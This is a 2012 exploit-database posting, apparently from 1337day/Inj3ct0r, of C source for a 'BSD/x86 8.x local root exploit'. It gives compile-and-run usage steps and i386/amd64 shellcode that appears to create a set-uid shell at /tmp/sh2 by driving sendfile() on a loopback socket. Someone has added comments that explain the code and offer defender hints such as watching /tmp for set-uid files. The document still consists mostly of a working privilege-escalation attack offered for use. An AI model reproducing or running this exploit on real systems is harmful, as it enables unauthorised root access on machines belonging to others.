Turkey

BSD/x86 Ver. 8.x - Local Root Exploit

Sep 23rd, 2012
  1. /*
  2. *
  3. *
  4. * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  5. * 0 _ __ __ __ 1
  6. * 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  7. * 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  8. * 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  9. * 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  10. * 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  11. * 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  12. * 1 \ \____/ >> Exploit database separated by exploit 0
  13. * 0 \/___/ type (local, remote, DoS, etc.) 1
  14. * 1 1
  15. * 0 [x] Official Website: http://www.1337day.com 0
  16. * 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
  17. * 0 0
  18. * 1 ========================================== 1
  19. * 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
  20. * 1 ========================================== 0
  21. * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
  22. * | |
  23. * | BSD/x86 Ver. 8.x - Local Root Exploit |
  24. * --------------------------------------------------------------------------
  25. *
  26. * +----------------| ABOUT ME |--------------------+
  27. * NAME: TAURUS OMAR -
  28. * LINE: INDEPENDENT SECURITY RESEARCHER -
  29. * HOME: ACCESOILEGAL.BLOGSPOT.COM -
  30. * TWITTER: @taurusomar_ -
  31. * E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
  32. * E-MAIL: omar-taurus[at]live[dot]com -
  33. * PWNED: #ZUUU -
  34. * +------------------------------------------------+
  35. *
  36. *
  37. * +-------------------------------+
  38. * Proof of CONCEPT IMAGES
  39. * http://i.imgur.com/whR3E.jpg
  40. * +-------------------------------+
  41. * Usage:
  42. * gcc 1337.c -o 1337
  43. * chmod 777 1337
  44. * ./1337
  45. *
  46. */
  47.  
  48. #include <stdio.h>
  49. #include <string.h>
  50. #include <sys/types.h>
  51. #include <sys/socket.h>
  52. #include <sys/uio.h>
  53. #include <sys/types.h>
  54. #include <sys/mman.h>
  55. #include <sys/proc.h>
  56. #include <fcntl.h>
  57. #include <netinet/in.h>
  58. #include <sys/select.h>
  59. #include <sys/stat.h>
  60. #include <strings.h>
  61. #include <stdio.h>
  62. #include <string.h>
  63. #include <err.h>
  64.  
  /*
   * main: expects exactly one argument, "i386" or "amd64". It connects a TCP
   * socket to 127.0.0.1:7030, opens /bin/sh read-only, and then loops until
   * st_size bytes of /bin/sh have been counted as sent. Each pass either
   * write()s a crafted buffer (0x90 filler followed by one of the byte arrays
   * below) to the socket, or sendfile()s up to 2048 bytes of /bin/sh from a
   * fixed file offset to the same socket.
   *
   * The page title calls this a local root exploit for BSD/x86 8.x. The code
   * shown here does not contain the listener on port 7030 or name the kernel
   * flaw it depends on -- NOTE(review): confirm against the vendor advisory
   * for the affected release before relying on this description.
   *
   * Defender notes (derived from what is visible below):
   *   - network: an unprivileged local process connecting to 127.0.0.1:7030
   *     while holding /bin/sh open and calling sendfile() on it;
   *   - filesystem: the byte arrays contain the ASCII paths "/tmp/sh" and
   *     "/tmp/sh2" and the constant 0x0ded (octal 06755); presumably a
   *     set-uid file under /tmp is the intended result -- watch for set-uid
   *     or set-gid files appearing there, and consider mounting /tmp nosuid;
   *   - integrity: compare /bin/sh against a known-good hash after any
   *     suspected run, since the file is the sendfile() source here.
   */
  65. main (int argc, char *argv[]) {
  66. int s, f, k2; /* s: TCP socket, f: fd for /bin/sh, k2: filler loop index */
  67. struct sockaddr_in addr;
  68. int flags;
  /*
   * Opaque machine-code bytes used when arch == 1 ("i386"). Printable
   * sequences inside: "/sh2", "/tm", "/tmp". Also contains the 32-bit
   * constant 0x00000ded (octal 06755, i.e. set-uid + set-gid + rwxr-xr-x if
   * used as a file mode). Not disassembled here; treat as untrusted payload.
   */
  69. char str32[]=
  70. "\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d\x2f\x74\x6d\x89\xe3"
  71. "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
  72. "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
  73. "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
  /*
   * Opaque machine-code bytes used when arch == 2 ("amd64"). Printable
   * sequences inside: "/tmp/sh" and "/tmp/sh2"; the bytes \xed\x0d (0x0ded)
   * appear here as well. Not disassembled here; treat as untrusted payload.
   */
  74. char str64[]=
  75. "\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x74\x6d\x70\x2f\x73\x68"
  76. "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
  77. "\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
  78. "\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
  79. "\xe7\x57\x52\x48\x89\xe6\x0f\x05";
  80.  
  81. char buf[20000]; /* staging buffer for the data passed to write() */
  82.  
  83. char *p;
  84. struct stat sb;
  85. int n;
  86. fd_set wset;
  87. int64_t size; /* remaining byte budget, initialised from /bin/sh's st_size */
  88. off_t sbytes; /* bytes reported sent by the last sendfile() call */
  89. off_t sent = 0; /* running total; only accumulated, never read back */
  90. int chunk; /* bytes still to sendfile() before the next write() */
  91. int arch = 3; /* 3 = not selected yet; 1 = i386, 2 = amd64 */
  92.  
  93. if (argc != 2) {
  94. printf("Definiendo Arquitectura.\n"); /* Spanish: "Defining architecture." */
  95. return;
  96. }
  97.  
  98. if (strcmp(argv[1], "i386") == 0)
  99. arch=1;
  100.  
  101. if (strcmp(argv[1], "amd64") == 0)
  102. arch=2;
  103.  
  104. if (arch == 3) { /* argument matched neither string: print a hint and stop */
  105. printf("Arquitectura Definida i386 or amd64\n");
  106. return;
  107. }
  108.  
  /* Loopback-only target: TCP 127.0.0.1, port 7030. The peer is not shown. */
  109. s = socket(AF_INET, SOCK_STREAM, 0);
  110. bzero(&addr, sizeof(addr));
  111. addr.sin_family = AF_INET;
  112. addr.sin_port = htons(7030);
  113. addr.sin_addr.s_addr = inet_addr("127.0.0.1");
  114.  
  115. n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
  116. if (n < 0)
  117. warn ("fail to connect"); /* warn() only prints; execution continues */
  118.  
  /* /bin/sh is opened read-only; it is the source file for sendfile() below. */
  119. f = open("/bin/sh", O_RDONLY);
  120. if (f<0)
  121. warn("fail to open file");
  122. n = fstat(f, &sb);
  123. if (n<0)
  124. warn("fstat failed");
  125.  
  126. size = sb.st_size;
  127. chunk = 0; /* zero forces the first loop pass down the write() path */
  128.  
  /* O_NONBLOCK is added to the flags of f (the file descriptor), not of s. */
  129. flags = fcntl(f, F_GETFL);
  130. flags |= O_NONBLOCK;
  131. fcntl(f, F_SETFL, flags);
  132.  
  133. while (size > 0) {
  134.  
  /* Wait until the socket is in the write set; nfds is computed from f. */
  135. FD_ZERO(&wset);
  136. FD_SET(s, &wset);
  137. n = select(f+1, NULL, &wset, NULL, NULL);
  138. if (n < 0)
  139. continue;
  140.  
  /*
   * sendfile() path. The seven-argument form matches FreeBSD's
   * sendfile(fd, s, offset, nbytes, hdtr, sbytes, flags). The file offset is
   * a constant per architecture: 2048*2 = 4096 for i386, 1204*6 = 7224 for
   * amd64. Only the counters advance between calls, not the offset.
   */
  141. if (chunk > 0) {
  142. sbytes = 0;
  143. if (arch == 1)
  144. n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
  145. if (arch == 2)
  146. n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
  147. if (n < 0)
  148. continue;
  149. chunk -= sbytes;
  150. size -= sbytes;
  151. sent += sbytes;
  152. continue;
  153. }
  154.  
  /* write() path: reached only when chunk == 0; re-arms chunk to 2048. */
  155. chunk = 2048;
  156.  
  157. memset(buf, '\0', sizeof buf);
  158. if (arch == 1) { /* 256 bytes of 0x90, then str32 including its NUL */
  159. for (k2=0;k2<256;k2++) {
  160. buf[k2] = 0x90;
  161. }
  162. p = buf;
  163. p = p + k2;
  164. memcpy(p, str32, sizeof str32);
  165.  
  166. n = k2 + sizeof str32; /* total length handed to write() */
  167. p = buf;
  168. }
  169.  
  170. if (arch == 2) { /* 100 bytes of 0x90, then str64 including its NUL */
  171. for (k2=0;k2<100;k2++) {
  172. buf[k2] = 0x90;
  173. }
  174. p = buf;
  175. p = p + k2;
  176. memcpy(p, str64, sizeof str64);
  177.  
  178. n = k2 + sizeof str64; /* total length handed to write() */
  179. p = buf;
  180. }
  181.  
  182. write(s, p, n); /* return value is not checked */
  183. }
  184. }
  185.  
  186.  
  187. # 1337day.com [2012-09-22]